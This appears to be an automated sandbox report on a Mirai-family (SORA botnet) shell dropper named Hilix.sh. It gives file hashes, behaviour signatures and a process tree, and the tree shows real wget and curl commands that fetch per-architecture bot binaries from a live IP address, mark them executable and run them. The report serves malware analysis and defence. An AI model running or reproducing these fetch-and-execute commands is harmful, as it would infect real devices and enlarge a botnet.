Analysis

  • max time kernel
    110s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    20-02-2025 09:10

General

  • Target

    Hilix.sh

  • Size

    1KB

  • MD5

    7196d305e319b48d1c38c317b091c7de

  • SHA1

    cb78ce3f944836e9d577f9c560e2a8f517980119

  • SHA256

    40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0

  • SHA512

    a3532d690518b21ffd451a9be324f1484a7a5cc4f5b196b568b5f4b4bf5087aa6a68845555f280a56cbd29ce33db5a82579f2b489dbeb80d7e1615d4e11e9966

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large number (184736) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 7 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 7 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Changes its process name 5 IoCs
  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Hilix.sh
    /tmp/Hilix.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:703
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Writes file to tmp directory
      PID:708
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:728
    • /bin/cat
      cat Hilix.x86
      2⤵
      PID:734
    • /bin/chmod
      chmod +x Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:735
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      PID:736
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:738
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:739
    • /bin/cat
      cat Hilix.mips
      2⤵
      • System Network Configuration Discovery
      PID:740
    • /bin/chmod
      chmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:741
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      PID:742
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.mpsl
      2⤵
      • Writes file to tmp directory
      PID:744
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:745
    • /bin/cat
      cat Hilix.mpsl
      2⤵
      PID:770
    • /bin/chmod
      chmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:771
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      • Modifies Watchdog functionality
      • Changes its process name
      PID:772
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.arm4
      2⤵
      PID:776
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.arm4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:786
    • /bin/chmod
      chmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:801
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      • Modifies Watchdog functionality
      • Changes its process name
      PID:802
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.arm5
      2⤵
      • Writes file to tmp directory
      PID:807
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:808
    • /bin/chmod
      chmod +x Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:810
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      • Modifies Watchdog functionality
      • Changes its process name
      PID:811
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.arm6
      2⤵
      • Writes file to tmp directory
      PID:814
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:817
    • /bin/chmod
      chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
      2⤵
      • File and Directory Permissions Modification
      PID:819
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      • Modifies Watchdog functionality
      • Changes its process name
      PID:820
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.arm7
      2⤵
      • Writes file to tmp directory
      PID:823
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:838
    • /bin/chmod
      chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH
      2⤵
      • File and Directory Permissions Modification
      PID:861
    • /tmp/SSH
      ./SSH Hilix-SSH
      2⤵
      • Modifies Watchdog functionality
      • Changes its process name
      PID:862
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.ppc
      2⤵
      • Writes file to tmp directory
      PID:865

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/SSH
    Filesize
    48KB
    MD5
    11863d3338efb145179a0f97dce5b8c1
    SHA1
    f2e14c388fdab6b68d9632190f0cbf6965c955f5
    SHA256
    0621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f
    SHA512
    87e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08

  • /tmp/SSH
    Filesize
    71KB
    MD5
    200e03d27fc14205a10f0d5a030475d9
    SHA1
    188c13983b81ed439c8f0cc12039b465ba6616ca
    SHA256
    acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d
    SHA512
    af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89

  • /tmp/SSH
    Filesize
    71KB
    MD5
    a23bd973e7ff662a50be1d058902f06c
    SHA1
    d32254694bcf9a61494f3edd1e0d96dd8866af95
    SHA256
    6f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e
    SHA512
    5ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df